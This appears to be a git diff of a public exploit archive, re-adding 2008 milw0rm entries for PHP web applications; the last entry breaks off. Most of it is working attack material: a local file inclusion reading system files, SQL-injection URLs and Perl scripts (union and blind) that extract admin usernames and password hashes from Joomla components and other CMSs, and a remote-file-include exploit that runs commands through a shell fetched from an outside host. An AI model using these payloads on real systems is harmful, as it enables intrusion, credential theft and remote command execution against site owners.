+  CMS little (index.php template) Local File Inclusion Vulnerability
+======================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 2 July 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : CMS little
+ VERSION     : 0.0.1
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/littlecms/CMSLite.zip
+#####################################################
+
+--- Local File Inclusion ---
+
+-----------------------------
+ Vulnerable File (index.php)
+-----------------------------
+
+@Line 
+   64:  include $currentpage[template];
+   65:  } else {
+   66:	include $template.".tmpl.php";
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[cmslite_path]/index.php?template=[LFI]
+
+
+------
+ POC
+------
+
+[+] http://[Target]/[cmslite_path]/index.php?template=../../../../../../../../boot.ini%00
+
+
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS.
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5993.txt b/platforms/php/webapps/5993.txt
index 34f059ab6..f8d897ce3 100755
--- a/platforms/php/webapps/5993.txt
+++ b/platforms/php/webapps/5993.txt
@@ -1,22 +1,22 @@
-/---------------------------------------------------------------\
-\                                				/
-/   Joomla Component Brightcode Weblinks Remote SQL injection   \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork      :  inurl:com__brightweblinks
-
-[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
-
-[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
-[*] Example2 :   http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
-     
-----------------------------------------------------------------------------
-[*] Greetings :  All friends & muslims HaCkeRs...
-[*] Greetings2:  http://www.dz-secure.com
-                 http://palcastle.org/cc
-
-# milw0rm.com [2008-07-02]
+/---------------------------------------------------------------\
+\                                				/
+/   Joomla Component Brightcode Weblinks Remote SQL injection   \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork      :  inurl:com__brightweblinks
+
+[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid={SQL}
+
+[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
+[*] Example2 :   http://localhost/[Joomla_Path]/index.php?option=com_brightweblinks&Itemid=58&catid= UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72--
+     
+----------------------------------------------------------------------------
+[*] Greetings :  All friends & muslims HaCkeRs...
+[*] Greetings2:  http://www.dz-secure.com
+                 http://palcastle.org/cc
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5994.pl b/platforms/php/webapps/5994.pl
index d92663012..ce5bcb1d4 100755
--- a/platforms/php/webapps/5994.pl
+++ b/platforms/php/webapps/5994.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl -w
-
-#   Joomla Component QuickTime VR v 0.1  Remote SQL Injection #
-########################################
-#[*] Found by : Houssamix From H-T Team 
-#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
-#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers
-
-#[*] Component_Name:  QuickTime VR
-#[*] Script_Name: Joomla
-#[*] Dork : index.php?option=com_vr
-########################################
-# QuickTime VR
-# Januari 2007
-# Bob
-# Pictura
-# bob@pictura-dp.nl
-# http://www.pictura-dp.nl/
-#  0.1 
-
-
-system("color f");
-print "\t\t########################################################\n\n";
-print "\t\t#                        Viva Islam                    #\n\n";
-print "\t\t########################################################\n\n";
-print "\t\t# Joomla Component QuickTime VR Remote SQL Injection   #\n\n";
-print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	              #\n\n";
-print "\t\t########################################################\n\n";
-
-use LWP::UserAgent;
-
-print "\nEnter your Target (http://site.com/joomla/): ";
-	chomp(my $target=);
-
-$uname="username";
-$magic="jos_users";
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-print "\n[+] The Target : ".$target."";
-
-if ($answer =~ /(.*?)/){
-       
-		print "\n[+] Admin User : $1";
-}
-$host2 = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20password,2/**/from/**/jos_users--";
-$res2 = $b->request(HTTP::Request->new(GET=>$host2));
-$answer = $res2->content;
-if ($answer =~/([0-9a-fA-F]{32})/){
-		print "\n[+] Admin Hash : $1\n\n";
-		print "#   Exploit succeed!  #\n\n";
-}
-else{print "\n[-] Exploit Failed...\n";
-}
-
-# codec  by Houssamix From H-T Team
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl -w
+
+#   Joomla Component QuickTime VR v 0.1  Remote SQL Injection #
+########################################
+#[*] Found by : Houssamix From H-T Team 
+#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
+#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers
+
+#[*] Component_Name:  QuickTime VR
+#[*] Script_Name: Joomla
+#[*] Dork : index.php?option=com_vr
+########################################
+# QuickTime VR
+# Januari 2007
+# Bob
+# Pictura
+# bob@pictura-dp.nl
+# http://www.pictura-dp.nl/
+#  0.1 
+
+
+system("color f");
+print "\t\t########################################################\n\n";
+print "\t\t#                        Viva Islam                    #\n\n";
+print "\t\t########################################################\n\n";
+print "\t\t# Joomla Component QuickTime VR Remote SQL Injection   #\n\n";
+print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	              #\n\n";
+print "\t\t########################################################\n\n";
+
+use LWP::UserAgent;
+
+print "\nEnter your Target (http://site.com/joomla/): ";
+	chomp(my $target=);
+
+$uname="username";
+$magic="jos_users";
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),2 from/**/".$magic."/**";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+print "\n[+] The Target : ".$target."";
+
+if ($answer =~ /(.*?)/){
+       
+		print "\n[+] Admin User : $1";
+}
+$host2 = $target . "index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1%20union%20select%20password,2/**/from/**/jos_users--";
+$res2 = $b->request(HTTP::Request->new(GET=>$host2));
+$answer = $res2->content;
+if ($answer =~/([0-9a-fA-F]{32})/){
+		print "\n[+] Admin Hash : $1\n\n";
+		print "#   Exploit succeed!  #\n\n";
+}
+else{print "\n[-] Exploit Failed...\n";
+}
+
+# codec  by Houssamix From H-T Team
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5995.pl b/platforms/php/webapps/5995.pl
index fa430d2c7..53853d236 100755
--- a/platforms/php/webapps/5995.pl
+++ b/platforms/php/webapps/5995.pl
@@ -1,64 +1,64 @@
-#!/usr/bin/perl -w
-
-#   Joomla Component is  v 1.0.1  Multiple Remote SQL Injection
-#  variables vuln : ( marka )  & ( motor ) 
-########################################
-#[*] Found by : Houssamix From H-T Team 
-#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
-#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers
-
-#[*] Component_Name:  is
-#[*] Script_Name: Joomla
-#[*] Dork : index.php?option=com_is
-########################################
-# is
-# 09.05.2006
-# MAXX MARKETING
-# by 2006 Maxx Marketing
-# klaus.huber@maxx-marketing.net
-# www.maxx-marketing.net
-# 1.0.1 
-
-
-system("color f");
-print "\t\t########################################################\n\n";
-print "\t\t#                        Viva Islam                    #\n\n";
-print "\t\t########################################################\n\n";
-print "\t\t# Joomla Component Is v 1.0.1 multiple SQL Injection   #\n\n";
-print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	              #\n\n";
-print "\t\t########################################################\n\n";
-
-use LWP::UserAgent;
-
-print "\nEnter your Target (http://site.com/joomla/): ";
-	chomp(my $target=);
-
-$uname="username";
-$magic="jos_users";
-
-$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
-$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
-
-$host = $target . "index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**";
-$res = $b->request(HTTP::Request->new(GET=>$host));
-$answer = $res->content;
-
-print "\n[+] The Target : ".$target."";
-
-if ($answer =~ /(.*?)/){
-       
-		print "\n[+] Admin User : $1";
-}
-$host2 = $target . "index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
-$res2 = $b->request(HTTP::Request->new(GET=>$host2));
-$answer = $res2->content;
-if ($answer =~/([0-9a-fA-F]{32})/){
-		print "\n[+] Admin Hash : $1\n\n";
-		print "#   Exploit succeed!  #\n\n";
-}
-else{print "\n[-] Exploit Failed...\n";
-}
-
-# codec  by Houssamix From H-T Team
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl -w
+
+#   Joomla Component is  v 1.0.1  Multiple Remote SQL Injection
+#  variables vuln : ( marka )  & ( motor ) 
+########################################
+#[*] Found by : Houssamix From H-T Team 
+#[*] H-T Team [ HouSSaMix + ToXiC350 ] 
+#[*] Greetz : Mr.Al3FrItE & Islamic Security Team  & Mounita20 & CoNaN and all musulmans hackers
+
+#[*] Component_Name:  is
+#[*] Script_Name: Joomla
+#[*] Dork : index.php?option=com_is
+########################################
+# is
+# 09.05.2006
+# MAXX MARKETING
+# by 2006 Maxx Marketing
+# klaus.huber@maxx-marketing.net
+# www.maxx-marketing.net
+# 1.0.1 
+
+
+system("color f");
+print "\t\t########################################################\n\n";
+print "\t\t#                        Viva Islam                    #\n\n";
+print "\t\t########################################################\n\n";
+print "\t\t# Joomla Component Is v 1.0.1 multiple SQL Injection   #\n\n";
+print "\t\t#       H-T Team [HouSSaMiX - ToXiC350]	              #\n\n";
+print "\t\t########################################################\n\n";
+
+use LWP::UserAgent;
+
+print "\nEnter your Target (http://site.com/joomla/): ";
+	chomp(my $target=);
+
+$uname="username";
+$magic="jos_users";
+
+$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
+$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
+
+$host = $target . "index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/**";
+$res = $b->request(HTTP::Request->new(GET=>$host));
+$answer = $res->content;
+
+print "\n[+] The Target : ".$target."";
+
+if ($answer =~ /(.*?)/){
+       
+		print "\n[+] Admin User : $1";
+}
+$host2 = $target . "index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--";
+$res2 = $b->request(HTTP::Request->new(GET=>$host2));
+$answer = $res2->content;
+if ($answer =~/([0-9a-fA-F]{32})/){
+		print "\n[+] Admin Hash : $1\n\n";
+		print "#   Exploit succeed!  #\n\n";
+}
+else{print "\n[-] Exploit Failed...\n";
+}
+
+# codec  by Houssamix From H-T Team
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5996.txt b/platforms/php/webapps/5996.txt
index 6bbff8959..d708dcf78 100755
--- a/platforms/php/webapps/5996.txt
+++ b/platforms/php/webapps/5996.txt
@@ -1,119 +1,119 @@
-#!/usr/bin/perl
-
-####################################################################################################
-#                                                                                                       
-# phportal_1.2_Beta (gunaysoft.php) Remote File Include Vulnerability                             
-#                                                                                                 
-# Discovered by : Ciph3r                        
-#                                                                                                   
-# Class:  Remote File Include Vulnerability                                                              
-#                                                                                                  
-# exemplary Exp: 
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=[shell]                 		 
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
-# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
-#                                                                                                
-# Remote: Yes                                                                                            
-#                                                                                                  
-# Type:   Highly critical                                                                                
-#                                                                                                        
-# Vulnerable Code: include($icerikyolu.$sayfaid.$uzanti);                           
-#                                                                                                        
-# Download:  http://sourceforge.net/project/showfiles.php?group_id=205263                
-#                                                                                                        
-# SP tanx4: Iranian hacker & Kurdish security TEAM                                                                 
-#                                                                                                    
-# sp TANX2: milw0rm.com & google.com & sourceforge.net     
-#                                                                                                        
-# Exploit: phportal.pl                                                                                
-#                                                                                                        
-# About phPortal : 
-#
-# phPortal is a Content Management System. phPortal contains phpBB2 core and
-# phPortal shell. If you have a phpBB2 forum.You may upgrade to phPortal.
-#                                                                                                    
-######################################################################################################
-
-use LWP::UserAgent;
-use LWP::Simple;
-
-$target = @ARGV[0];
-$shellsite = @ARGV[1];
-$shellcmd = @ARGV[2];
-$file = "sablonlar/gunaysoft/gunaysoft.php?uzanti=";
-
-if(!$target || !$shellsite)
-{
-    usage();
-}
-
-header();
-
-print "Type 'exit' to quit";
-print "[cmd]\$";
-$cmd = ;
-
-while ($cmd !~ "exit")
-{
-    $xpl = LWP::UserAgent->new() or die;
-        $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
-        $res = $xpl->request($req);
-        $r = $res->content;
-        $r =~ tr/[\n]/[ê]/;
-
-    if (@ARGV[4] eq "-r")
-    {
-        print $r;
-    }
-    elsif (@ARGV[5] eq "-p")
-    {
-    # if not working change cmd variable to null and apply patch manually.
-    $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
-    print q
-    {
-
-    }
-    }
-    else
-    {
-    print "[cmd]\$";
-    $cmd = ;
-    }
-}
-
-sub header()
-{
-    print q
-    {
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-
-                        Discovered by : Ciph3r
-                  phportal.pl   - Remote File Include Exploit
-                  SP tanx4: Iranian hacker & Kurdish security TEAM
-                          Ciph3r_blackhat@yahoo.com
-                  sp TANX2: milw0rm.com & google.com & sourceforge.net
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-    };
-}
-
-sub usage()
-{
-header();
-    print q
-    {
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-Usage:
-perl phportal.pl    <-r> <-p>
- - Path to target eg: www.victim.com
- - Path to shell eg: http://h1.ripway.com/boukan/r57.txt?                  
- - Shell command variable name eg: Pwd
- - Show output from shell
-
     - sablonlar/gunaysoft/gunaysoft.php
-Example:
-perl phportal.pl  http://localhost/include http://localhost/r57.php cmd -r -p
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-    };
-exit();
-}
-
-# milw0rm.com [2008-07-02]
+#!/usr/bin/perl
+
+####################################################################################################
+#                                                                                                       
+# phportal_1.2_Beta (gunaysoft.php) Remote File Include Vulnerability                             
+#                                                                                                 
+# Discovered by : Ciph3r                        
+#                                                                                                   
+# Class:  Remote File Include Vulnerability                                                              
+#                                                                                                  
+# exemplary Exp: 
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=[shell]                 		 
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
+# http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
+#                                                                                                
+# Remote: Yes                                                                                            
+#                                                                                                  
+# Type:   Highly critical                                                                                
+#                                                                                                        
+# Vulnerable Code: include($icerikyolu.$sayfaid.$uzanti);                           
+#                                                                                                        
+# Download:  http://sourceforge.net/project/showfiles.php?group_id=205263                
+#                                                                                                        
+# SP tanx4: Iranian hacker & Kurdish security TEAM                                                                 
+#                                                                                                    
+# sp TANX2: milw0rm.com & google.com & sourceforge.net     
+#                                                                                                        
+# Exploit: phportal.pl                                                                                
+#                                                                                                        
+# About phPortal : 
+#
+# phPortal is a Content Management System. phPortal contains phpBB2 core and
+# phPortal shell. If you have a phpBB2 forum.You may upgrade to phPortal.
+#                                                                                                    
+######################################################################################################
+
+use LWP::UserAgent;
+use LWP::Simple;
+
+$target = @ARGV[0];
+$shellsite = @ARGV[1];
+$shellcmd = @ARGV[2];
+$file = "sablonlar/gunaysoft/gunaysoft.php?uzanti=";
+
+if(!$target || !$shellsite)
+{
+    usage();
+}
+
+header();
+
+print "Type 'exit' to quit";
+print "[cmd]\$";
+$cmd = ;
+
+while ($cmd !~ "exit")
+{
+    $xpl = LWP::UserAgent->new() or die;
+        $req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
+        $res = $xpl->request($req);
+        $r = $res->content;
+        $r =~ tr/[\n]/[ê]/;
+
+    if (@ARGV[4] eq "-r")
+    {
+        print $r;
+    }
+    elsif (@ARGV[5] eq "-p")
+    {
+    # if not working change cmd variable to null and apply patch manually.
+    $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
+    print q
+    {
+
+    }
+    }
+    else
+    {
+    print "[cmd]\$";
+    $cmd = ;
+    }
+}
+
+sub header()
+{
+    print q
+    {
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+                        Discovered by : Ciph3r
+                  phportal.pl   - Remote File Include Exploit
+                  SP tanx4: Iranian hacker & Kurdish security TEAM
+                          Ciph3r_blackhat@yahoo.com
+                  sp TANX2: milw0rm.com & google.com & sourceforge.net
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+    };
+}
+
+sub usage()
+{
+header();
+    print q
+    {
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+Usage:
+perl phportal.pl    <-r> <-p>
+ - Path to target eg: www.victim.com
+ - Path to shell eg: http://h1.ripway.com/boukan/r57.txt?                  
+ - Shell command variable name eg: Pwd
+ - Show output from shell
+
     - sablonlar/gunaysoft/gunaysoft.php
+Example:
+perl phportal.pl  http://localhost/include http://localhost/r57.php cmd -r -p
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+    };
+exit();
+}
+
+# milw0rm.com [2008-07-02]
diff --git a/platforms/php/webapps/5997.pl b/platforms/php/webapps/5997.pl
index 84fdb10a0..4aeeb4a96 100755
--- a/platforms/php/webapps/5997.pl
+++ b/platforms/php/webapps/5997.pl
@@ -1,63 +1,63 @@
-#/usr/bin/perl
-
-#|+| Vendor Not Notified
-#|+| Author: Bl@ckbe@rD
-#|+| Discovered On: 10 june  2008
-#|+| greetz: InjEctOrs , underz0ne crew 
-#--//-->
-# -- CMS webBlizzard  Blind SQL Injection Exploit --
-#--//--> Exploit :
-use strict;
-use LWP::Simple;
-
-print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";
-print "-                                                                  -\n";
-print "-                                                                  -\n";
-print "-                                                                  -\n";
-print "-         CMS WebBlizzard  Blind SQL Injection exploit             -\n";
-print "-                                                                  -\n";
-print "-                                                                  -\n";
-print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";
-
-print "\nEnter URL (ie: http://site.com): ";
-	chomp(my $url=);
-	
-if(inject_test($url)) {
-	print "Injecting.. Please Wait this could take several minutes..\n\n";
-	my $details = blind($url);
-	print "Exploit Success! Admin Details: ".$details;
-	exit;
-}
-
-sub blind {
-
-	my $url    = shift;
-	my $res    = undef;
-	my $chr    = 48;
-	my $substr = 1;
-	my $done   = 1;
-	
-	while($done) {
-		my $content = get($url."/index.php?page=6)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
-mysql.user),".$substr.",1))=".$chr."/*");
-		
-		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
-			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
-				else { $chr++; }
-	}
-	return $res;
-}
-
-sub inject_test {
-
-	my $url     = shift;
-	my $true    = get($url."/index.php?page=6) and 1=1 /*");
-	my $false   = get($url."/index.php?page=6) and 1=2 /*");
-	
-	if($true =~ /Previous/ && $false !~ /Previous/) {
-		print "\nTarget Site Vulnerable!\n\n";
-		return 1;
-	} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
-}
-
-# milw0rm.com [2008-07-03]
+#/usr/bin/perl
+
+#|+| Vendor Not Notified
+#|+| Author: Bl@ckbe@rD
+#|+| Discovered On: 10 june  2008
+#|+| greetz: InjEctOrs , underz0ne crew 
+#--//-->
+# -- CMS webBlizzard  Blind SQL Injection Exploit --
+#--//--> Exploit :
+use strict;
+use LWP::Simple;
+
+print "-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-\n";
+print "-                                                                  -\n";
+print "-                                                                  -\n";
+print "-                                                                  -\n";
+print "-         CMS WebBlizzard  Blind SQL Injection exploit             -\n";
+print "-                                                                  -\n";
+print "-                                                                  -\n";
+print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-\n";
+
+print "\nEnter URL (ie: http://site.com): ";
+	chomp(my $url=);
+	
+if(inject_test($url)) {
+	print "Injecting.. Please Wait this could take several minutes..\n\n";
+	my $details = blind($url);
+	print "Exploit Success! Admin Details: ".$details;
+	exit;
+}
+
+sub blind {
+
+	my $url    = shift;
+	my $res    = undef;
+	my $chr    = 48;
+	my $substr = 1;
+	my $done   = 1;
+	
+	while($done) {
+		my $content = get($url."/index.php?page=6)  and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM 
+mysql.user),".$substr.",1))=".$chr."/*");
+		
+		if($content =~ /Previous/ && $chr == 94) { $done = 0; }
+			elsif($content =~ /Previous/) { $res .= chr($chr); $substr++; $chr = 48; }
+				else { $chr++; }
+	}
+	return $res;
+}
+
+sub inject_test {
+
+	my $url     = shift;
+	my $true    = get($url."/index.php?page=6) and 1=1 /*");
+	my $false   = get($url."/index.php?page=6) and 1=2 /*");
+	
+	if($true =~ /Previous/ && $false !~ /Previous/) {
+		print "\nTarget Site Vulnerable!\n\n";
+		return 1;
+	} else { print "\nTarget Site Not Vulnerable! Exiting..\n"; exit; }
+}
+
+# milw0rm.com [2008-07-03]
diff --git a/platforms/php/webapps/5998.txt b/platforms/php/webapps/5998.txt
index fa313fd42..7b6e3c878 100755
--- a/platforms/php/webapps/5998.txt
+++ b/platforms/php/webapps/5998.txt
@@ -1,34 +1,34 @@
-  ____       _   _       _ ___   __                        _  __
- / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
-| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
-| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
- \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
----------------------------------------------------------------------------|___/
-Exploit found by sToRm
-
-
-phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online)
-SQL Injection
-
-
-SQL Injection
--------------
-
-index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
-
-
-$id_kat=$_GET[id_kat];			  
-$m_conn = db_connect();
-if ((empty($id_kat))||($id_kat==''))
-	$m_sql = "select * from berita where status='tampil' and order by tgl desc";
-else
-	$m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc";
-
-
-Here, we have a classic SQL MySQL injection.  The GET variable "id_kat" isn't sanitized before being passed to the query.  By injecting our string, the query becomes:
-
-select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc
-
-The comment renders the rest of the query to be useless.  We are effectively grabbing the first user from the table "user", which is the admin.  You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.
-
-# milw0rm.com [2008-07-03]
+  ____       _   _       _ ___   __                        _  __
+ / ___| ___ | \ | |_   _| | \ \ / /__  _   _ _ __ ___  ___| |/ _| ___  _ __ __ _
+| |  _ / _ \|  \| | | | | | |\ V / _ \| | | | '__/ __|/ _ \ | |_ / _ \| '__/ _` |
+| |_| | (_) | |\  | |_| | | | | | (_) | |_| | |  \__ \  __/ |  _| (_) | | | (_| |
+ \____|\___/|_| \_|\__,_|_|_| |_|\___/ \__,_|_|  |___/\___|_|_|(_)___/|_|  \__, |
+---------------------------------------------------------------------------|___/
+Exploit found by sToRm
+
+
+phpWebNews v0.2 MySQL Edition (Surat kabar/News Management Online)
+SQL Injection
+
+
+SQL Injection
+-------------
+
+index.php?id_kat=null+UNION+ALL+SELECT+1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13+FROM+user--
+
+
+$id_kat=$_GET[id_kat];			  
+$m_conn = db_connect();
+if ((empty($id_kat))||($id_kat==''))
+	$m_sql = "select * from berita where status='tampil' and order by tgl desc";
+else
+	$m_sql = "select * from berita where status='tampil' and kode_kategori=$id_kat and isi_berita like %'$m_txt'% order by tgl desc";
+
+
+Here, we have a classic SQL MySQL injection.  The GET variable "id_kat" isn't sanitized before being passed to the query.  By injecting our string, the query becomes:
+
+select * from berita where status='tampil' and kode_kategori=null UNION ALL SELECT 1,2,3,4,concat(user,0x3a,passwd),6,7,8,9,10,11,12,13 FROM user-- and isi_berita like %'$m_txt'% order by tgl desc
+
+The comment renders the rest of the query to be useless.  We are effectively grabbing the first user from the table "user", which is the admin.  You can inject the other strings with server variables and attempt to fetch mysql.user hashes, if the conditions apply.
+
+# milw0rm.com [2008-07-03]
diff --git a/platforms/php/webapps/5999.txt b/platforms/php/webapps/5999.txt
index fd2e9a5c3..8c14f423b 100755
--- a/platforms/php/webapps/5999.txt
+++ b/platforms/php/webapps/5999.txt
@@ -1,29 +1,29 @@
-#######################################################################################
-#                                                                                                                                                                 
-#        ...:::::phpwebnews-mysql 0.2  SQL Injection Vulnerability ::::....                                           
-#                                                                                                                                                                 
-#######################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-=================================================================================
-Discoverd By :virangar security team
-
-User In Virangar : d4v00d_cr4ck3r
-=================================================================================
-Special TNX To:Mr.nosrati,H4di.H4di,black.shadowes,Mr.hesy,Zahra
-
-& All virangar Members & All hackerz
- =================================================================================
-Download:
